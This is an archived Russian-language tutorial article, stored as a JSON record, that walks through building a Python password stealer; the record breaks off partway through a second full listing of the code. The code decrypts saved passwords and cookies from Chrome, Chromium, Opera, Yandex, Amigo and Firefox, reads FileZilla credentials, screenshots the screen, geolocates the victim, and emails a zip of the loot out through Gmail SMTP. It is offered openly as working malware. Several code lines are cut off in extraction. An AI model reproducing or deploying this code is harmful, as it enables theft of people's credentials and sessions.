{
	"id": "bfda659f-157b-4fdb-a9e9-8e6f1b803f1b",
	"created_at": "2026-04-06T00:12:09.58563Z",
	"updated_at": "2026-04-10T13:12:42.616811Z",
	"deleted_at": null,
	"sha1_hash": "8fed81b350197ad3e99eff56cda2e1e958498825",
	"title": "Стиллер паролей на python с отправкой на почту",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 291749,
	"plain_text": "Стиллер паролей на python с отправкой на почту\r\nPublished: 2019-12-13 · Archived: 2026-04-05 21:57:56 UTC\r\nInvite pending\r\nСтиллер паролей на python\r\nПривет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров\r\nтаких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на\r\nкотором открыли стиллер, его место нахождение и его установленная система.\r\nПриступим к делу\r\nСоздаем новый файл в IDLE Python или в другой IDE.\r\nПодключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 1 of 20\n\nВсе нужные модули\r\npip install pyinstaller\r\npip install requests==2.7.0\r\npip install pywin32\r\npip install ip2geotools\r\npip install opencv-python\r\npip install Pillow\r\npip install db-sqlite3\r\npip install temp\r\nimport os\r\nfrom Crypto.Hash import SHA512\r\nimport sqlite3\r\nimport win32crypt\r\nimport email, ssl\r\nimport shutil\r\nimport requests\r\nimport zipfile\r\nimport getpass\r\nimport ip2geotools\r\nimport win32api\r\nimport platform\r\nimport tempfile\r\nimport smtplib\r\nimport time\r\nimport cv2\r\nimport sys\r\nfrom PIL import ImageGrab\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.message import Message\r\nfrom email.mime.multipart import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nfrom Tools.demo.mcast import sender\r\nfrom ip2geotools.databases.noncommercial import DbIpCity\r\nfrom os.path import basename\r\nfrom smtplib import SMTP\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom base64 import encodebytes\r\nimport random\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 2 of 20\n\nСобираем с пользователя все его 
данные.\r\n################################################################################\r\n# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #\r\n################################################################################\r\ndrives = str(win32api.GetLogicalDriveStrings())\r\ndrives = str(drives.split('\\000')[:-1])\r\nresponse = DbIpCity.get(requests.get(\"https://ramziv.com/ip\").text, api_key='free')\r\nall_data = \"Time: \" + time.asctime() + '\\n' + \"Кодировка ФС: \" + sys.getfilesystemencoding() + '\\n' + \"Cpu: \"\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\alldata.txt', \"w+\") #создаем txt с его расположением\r\nfile.write(all_data)#записываем данные\r\nfile.close()#выходим\r\nСобираем пароли с хрома.\r\n################################################################################\r\n# GOOGLE PASSWORDS #\r\n################################################################################\r\ndef Chrome():\r\n text = 'Passwords Chrome:' + '\\n'\r\n text += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"L\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n text += url + ' | ' + login + ' | ' + password + '\\n'\r\n return text\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_pass.txt', \"w+\") #создаем txt с его расположением\r\nfile.write(str(Chrome()) + '\\n')#записываем данные\r\nfile.close()\r\n#выходим\r\nСобираем куки с 
хрома.\r\n################################################################################\r\n# GOOGLE Cookies #\r\n################################################################################\r\ndef Chrome_cockie():\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 3 of 20\n\ntextc = 'Cookies Chrome:' + '\\n'\r\n textc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_cookies.txt', \"w+\")\r\nfile.write(str(Chrome_cockie()) + '\\n')\r\nfile.close()\r\nКуки с firefox.\r\n################################################################################\r\n# FIREFOX Cookies #\r\n################################################################################\r\ndef Firefox():\r\n textf = ''\r\n textf +='Firefox Cookies:' + '\\n'\r\n textf += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n for root, dirs, files in os.walk(os.getenv(\"APPDATA\") + '\\\\Mozilla\\\\Firefox\\\\Profiles'):\r\n for name in dirs:\r\n conn = sqlite3.connect(os.path.join(root, name)+'\\\\cookies.sqlite')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT baseDomain, value, name FROM moz_cookies\")\r\n data = cursor.fetchall()\r\n for i in range(len(data)):\r\n url, cookie, name = data[i]\r\n textf += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n break\r\n return textf\r\nfile = open(os.getenv(\"APPDATA\") + 
'\\\\firefox_cookies.txt', \"w+\")\r\nfile.write(str(Firefox()) + '\\n')\r\nfile.close()\r\nПароли с хромиума.\r\n################################################################################\r\n# CHROMIUM PASSWORDS #\r\n################################################################################\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 4 of 20\n\ndef chromium():\r\n textch ='Chromium Passwords:' + '\\n'\r\n textch += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAP\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textch += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textch\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium.txt', \"w+\")\r\nfile.write(str(chromium()) + '\\n')\r\nfile.close()\r\nКуки с хромиума.\r\n################################################################################\r\n# CHROMIUM cookies #\r\n################################################################################\r\ndef chromiumc():\r\n textchc = ''\r\n textchc +='Chromium Cookies:' + '\\n'\r\n textchc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n 
cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textchc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textchc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium_cookies.txt', \"w+\")\r\nfile.write(str(chromiumc()) + '\\n')\r\nfile.close()\r\nПароли с амиго.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 5 of 20\n\n################################################################################\r\n# AMIGO PASSWORDS #\r\n################################################################################\r\ndef Amigo():\r\n textam = 'Passwords Amigo:' + '\\n'\r\n textam += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textam += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_pass.txt', \"w+\")\r\nfile.write(str(Amigo()) + '\\n')\r\nfile.close()\r\nКуки с амиго.\r\n################################################################################\r\n# AMIGO cookies #\r\n################################################################################\r\ndef Amigo_c():\r\n textamc = 'Cookies Amigo:' + '\\n'\r\n textamc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies'):\r\n 
shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDATA\"\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textamc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textamc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_cookies.txt', \"w+\")\r\nfile.write(str(Amigo_c()) + '\\n')\r\nfile.close()\r\nПароли с оперы.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 6 of 20\n\n################################################################################\r\n# OPERA PASSWORDS #\r\n################################################################################\r\ndef Opera():\r\n texto = 'Passwords Opera:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data', os.getenv(\"APPDATA\") +\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_pass.txt', \"w+\")\r\nfile.write(str(Opera()) + '\\n')\r\nfile.close()\r\nПароли с фаира.\r\n################################################################################\r\n# FIREFOX PASSWORDS 
#\r\n################################################################################\r\ndef Firefox_cookies():\r\n texto = 'Passwords firefox:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2', os.getenv(\"APPDATA\") + '\\\\Ap\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_pass.txt', \"w+\")\r\nfile.write(str(Firefox_cookies()) + '\\n')\r\nfile.close()\r\nПароли с яндекс браузера.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 7 of 20\n\n################################################################################\r\n# YANDEX PASSWORDS #\r\n################################################################################\r\ndef Yandexpass():\r\n textyp = 'Passwords Yandex:' + '\\n'\r\n textyp += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db'\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandexe\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Log\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = 
result[0]\r\n if password != '':\r\n textyp += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textyp\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\yandex_passwords.txt', \"w+\")\r\nfile.write(str(Yandexpass()) + '\\n')\r\nfile.close()\r\nКуки с оперы.\r\n################################################################################\r\n# OPERA cookies #\r\n################################################################################\r\ndef Opera_c():\r\n textoc ='Cookies Opera:' + '\\n'\r\n textoc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCAL\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textoc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textoc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_cookies.txt', \"w+\")\r\nfile.write(str(Opera_c()) + '\\n')\r\nfile.close()\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 8 of 20\n\nДанные с FILEZILLA.\r\n################################################################################\r\n# FILEZILLA #\r\n################################################################################\r\ndef filezilla():\r\n try:\r\n data = ''\r\n if os.path.isfile(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml') is True:\r\n root = etree.parse(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml').getroot()\r\n for i in range(len(root[0])):\r\n host = root[0][i][0].text\r\n port = root[0][i][1].text\r\n user = root[0][i][4].text\r\n password = 
base64.b64decode(root[0][i][5].text).decode('utf-8')\r\n data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\\n'\r\n return data\r\n else:\r\n return 'Not found'\r\n except Exception:\r\n return 'Error'\r\ntextfz = filezilla()\r\ntextfz += 'Filezilla: ' + '\\n' + filezilla() + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\filezilla.txt', \"w+\")\r\nfile.write(str(filezilla()) + '\\n')\r\nfile.close()\r\nДелаем скриншот экрана.\r\n################################################################################\r\n# SCREEN #\r\n################################################################################\r\nscreen = ImageGrab.grab()\r\nscreen.save(os.getenv(\"APPDATA\") + '\\\\sreenshot.jpg')\r\nТут записываем наши тхт в один ZIP — doc.\r\n################################################################################\r\n# PACKING TO ZIP #\r\n################################################################################\r\nzname = r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nNZ = zipfile.ZipFile(zname,'w')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\yandex_passwords.txt')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 9 of 20\n\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\alldata.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + 
getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\filezilla.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\sreenshot.jpg')\r\nNZ.close()\r\nВот он наш ZIP по всеми данными.\r\n################################################################################\r\n# DOC-НАШ ZIP #\r\n################################################################################\r\ndoc = 'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nОформляем отправку.\r\n################################################################################\r\n# ОТПРАВКА #\r\n################################################################################\r\n'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')\r\nmsgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'тут ваша новая почта с которой отправится'\r\nmsg['To'] = 'почта на которую отправится'\r\nmsg['Subject'] = getpass.getuser() + '-PC'\r\nmsg.attach(msgtext)\r\nТут мы создаем вложение для нашего doc'а ZIP.\r\n################################################################################\r\n# СОЗДАНИЕ Вложения #\r\n################################################################################\r\npart = MIMEBase('application', \"zip\")\r\nb = open(doc, \"rb\").read()\r\nbs = encodebytes(b).decode()\r\npart.set_payload(bs)\r\npart.add_header('Content-Transfer-Encoding', 'base64')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 10 of 20\n\npart.add_header('Content-Disposition', 'attachment; 
filename=\"LOG.zip\"')\r\nmsg.attach(part)\r\nЗдесь мы собственно производим отправку на емаил с помощью SMTP\r\n################################################################################\r\n# ОТПРАВКА ВАМ #\r\n################################################################################\r\ns = smtplib.SMTP('smtp.gmail.com', 587)#ваш почтовый сервис,советую создавать новую гмаил\r\ns.starttls()\r\ns.login('тут ваша новая почта с которой отправится', 'тут пароль от новой почты')\r\ns.sendmail('тут ваша новая почта с которой отправится', 'почта на которую отправится', msg.as_string())\r\ns.quit()\r\ni = input()\r\nЧтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:\r\nНа странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к\r\nаккаунту, и включите. Тогда все будет ОК.\r\nВесь код\r\nimport os\r\nfrom Crypto.Hash import SHA512\r\nimport sqlite3\r\nimport win32crypt\r\nimport email, ssl\r\nimport shutil\r\nimport requests\r\nimport zipfile\r\nimport getpass\r\nimport ip2geotools\r\nimport win32api\r\nimport platform\r\nimport tempfile\r\nimport smtplib\r\nimport time\r\nimport cv2\r\nimport sys\r\nfrom PIL import ImageGrab\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.message import Message\r\nfrom email.mime.multipart import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 11 of 20\n\nfrom Tools.demo.mcast import sender\r\nfrom ip2geotools.databases.noncommercial import DbIpCity\r\nfrom os.path import basename\r\nfrom smtplib import SMTP\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom base64 import encodebytes\r\nimport random\r\n################################################################################\r\n# ВСЕ ДАННЫЕ И ЛОКАЦИЯ 
#\r\n################################################################################\r\ndrives = str(win32api.GetLogicalDriveStrings())\r\ndrives = str(drives.split('\\000')[:-1])\r\nresponse = DbIpCity.get(requests.get(\"https://ramziv.com/ip\").text, api_key='free')\r\nall_data = \"Time: \" + time.asctime() + '\\n' + \"Кодировка ФС: \" + sys.getfilesystemencoding() + '\\n' + \"Cpu: \"\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\alldata.txt', \"w+\")\r\nfile.write(all_data)\r\nfile.close()\r\n################################################################################\r\n# GOOGLE PASSWORDS #\r\n################################################################################\r\ndef Chrome():\r\n text = 'Passwords Chrome:' + '\\n'\r\n text += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"L\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n text += url + ' | ' + login + ' | ' + password + '\\n'\r\n return text\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_pass.txt', \"w+\")\r\nfile.write(str(Chrome()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# GOOGLE Cookies #\r\n################################################################################\r\ndef Chrome_cockie():\r\n textc = 'Cookies Chrome:' + '\\n'\r\n textc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + 
'\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCA\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 12 of 20\n\nconn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_cookies.txt', \"w+\")\r\nfile.write(str(Chrome_cockie()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FIREFOX Cookies #\r\n################################################################################\r\ndef Firefox():\r\n textf = ''\r\n textf +='Firefox Cookies:' + '\\n'\r\n textf += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n for root, dirs, files in os.walk(os.getenv(\"APPDATA\") + '\\\\Mozilla\\\\Firefox\\\\Profiles'):\r\n for name in dirs:\r\n conn = sqlite3.connect(os.path.join(root, name)+'\\\\cookies.sqlite')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT baseDomain, value, name FROM moz_cookies\")\r\n data = cursor.fetchall()\r\n for i in range(len(data)):\r\n url, cookie, name = data[i]\r\n textf += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n break\r\n return textf\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_cookies.txt', \"w+\")\r\nfile.write(str(Firefox()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# CHROMIUM PASSWORDS #\r\n################################################################################\r\ndef chromium():\r\n textch ='Chromium Passwords:' + '\\n'\r\n textch += 'URL | LOGIN | PASSWORD' 
+ '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAP\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 13 of 20\n\nurl = result[0]\r\n if password != '':\r\n textch += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textch\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium.txt', \"w+\")\r\nfile.write(str(chromium()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# CHROMIUM cookies #\r\n################################################################################\r\ndef chromiumc():\r\n textchc = ''\r\n textchc +='Chromium Cookies:' + '\\n'\r\n textchc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textchc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textchc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium_cookies.txt', \"w+\")\r\nfile.write(str(chromiumc()) + 
'\\n')\r\nfile.close()\r\n################################################################################\r\n# AMIGO PASSWORDS #\r\n################################################################################\r\ndef Amigo():\r\n textam = 'Passwords Amigo:' + '\\n'\r\n textam += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textam += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_pass.txt', \"w+\")\r\nfile.write(str(Amigo()) + '\\n')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 14 of 20\n\nfile.close()\r\n################################################################################\r\n# AMIGO cookies #\r\n################################################################################\r\ndef Amigo_c():\r\n textamc = 'Cookies Amigo:' + '\\n'\r\n textamc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDATA\"\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User 